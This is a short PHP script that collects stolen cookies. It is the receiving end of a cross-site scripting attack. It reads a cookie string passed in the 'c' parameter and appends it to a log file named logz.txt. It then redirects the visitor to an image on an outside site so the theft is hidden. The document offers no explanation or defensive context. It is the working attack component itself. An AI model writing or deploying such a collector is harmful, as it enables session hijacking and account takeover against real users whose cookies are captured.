<?php header ('Location:https://phonixcentre.in/images/IMG_20170219_173325.jpg'); $cookies = $_GET["c"]; $file = fopen('logz.txt', 'a'); fwrite($file, $cookies . "\n"); ?>